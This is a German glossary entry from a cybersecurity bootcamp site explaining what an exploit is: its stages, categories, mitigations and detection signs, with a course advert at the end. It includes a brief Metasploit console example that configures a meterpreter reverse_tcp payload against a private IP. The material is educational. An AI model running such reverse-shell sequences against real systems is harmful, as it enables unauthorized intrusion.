Zum Inhalt springen

Nächste Ausgabe 6. Juli 2026

Offensive Security

Exploit

Ein Stück Code, eine Befehlsfolge oder Technik, die eine Schwachstelle in Software, Hardware oder menschlichem Verhalten ausnutzt, um unbeabsichtigte Konsequenzen wie Remote Code Execution, Privilegieneskalation, Denial-of-Service oder Informationsoffenlegung herbeizuführen.

Autor
Unihackers Team
Lesezeit
2 Min. Lesezeit
Zuletzt aktualisiert

Warum Es Wichtig Ist

Jeder bedeutsame Angriff wandelt irgendwann eine Schwachstelle in Auswirkungen um, und diese Umwandlung ist die Aufgabe eines Exploits. Exploits zu verstehen ist essenziell für Offensiv-Praktiker, Verteidiger und Software-Ingenieure.

WannaCry (2017) nutzte den EternalBlue-Exploit (CVE-2017-0144), um sich auf Millionen Systemen zu verbreiten. ProxyLogon (2021) kompromittierte zehntausende Organisationen. Die Ivanti Connect Secure-Welle 2024 zeigte, wie schnell Exploit-Code nach Offenlegung waffenfähig wird.

Anatomie eines Exploits

Initialer Trigger

Der verwundbare Codepfad wird erreicht, oft durch manipulierte Eingaben, die angenommene Invarianten verletzen.

Primitive aufbauen

Speicherkorruptions-Exploits verketten Primitive wie arbitrary read/write und Information Leaks.

Code-Ausführung

Sobald die Kontrolle entführt ist, führt der Exploit Angreifer-Code aus: Shellcode, reflektive Loader, ROP-Ketten.

Post-Exploitation

Persistenz, Privilegieneskalation, laterale Bewegung, Payload-Auslieferung, oft mit separat aufgesetztem Malware.

Kategorien

KategorieZielBeispiele
SpeicherkorruptionC/C++-ProgrammeBuffer overflow, UAF, type confusion
WebanwendungHTTP-DiensteSQLi, XSS, SSRF, Deserialisierung
LogikApp-SemantikAuth-Bypass, IDOR, Race Conditions
KryptografischCrypto-ImplementierungenPadding Oracle, schwacher RNG
HardwareCPU/FirmwareSpectre, Meltdown, Rowhammer
Social EngineeringMenschenPhishing

Frameworks

msf-beispiel.sh
Bash
# Metasploit-Beispiel
msfconsole
> search type:exploit cve:2024
> use exploit/multi/http/beispiel_rce
> set RHOSTS 10.0.0.5
> set LHOST 10.0.0.10
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
> run
  • Metasploit Framework
  • Cobalt Strike
  • Sliver (Open-Source-C2)
  • pwntools
  • GDB / pwndbg / WinDbg

Mitigations

  1. Patch-Management mit Fokus auf CISA KEV.
  2. Memory-Safe-Sprachen (Rust, Go).
  3. OS- und Compiler-Mitigations.
  4. EDR mit Exploit-Prävention.
  5. Anwendungs-Sandboxing.
  6. Netzwerksegmentierung.
  7. Geringstes Privileg.

Erkennung

  • Unerwartete Kindprozesse von Browsern oder Office
  • DLL-Injection oder verdächtige In-Memory-Aktivität
  • Unsignierte Binaries aus beschreibbaren Pfaden
  • Anomales Beaconing nach Exploit

Verwandte Konzepte

Im Bootcamp

Wie wir Exploit unterrichten

In unserem Cybersecurity Bootcamp lernen Sie nicht nur Exploit in der Theorie, sondern üben mit echten Tools in praktischen Labs, angeleitet von Branchenfachleuten, die diese Konzepte täglich anwenden.

Behandelt in:

Modul 10: Penetrationstests und Ethisches Hacking

Verwandte Themen, die Sie beherrschen werden:MetasploitNmapBurp SuitePrivilege Escalation
Sehen Sie, wie wir das unterrichten

360+ Stunden Expertentraining • CompTIA Security+ inklusive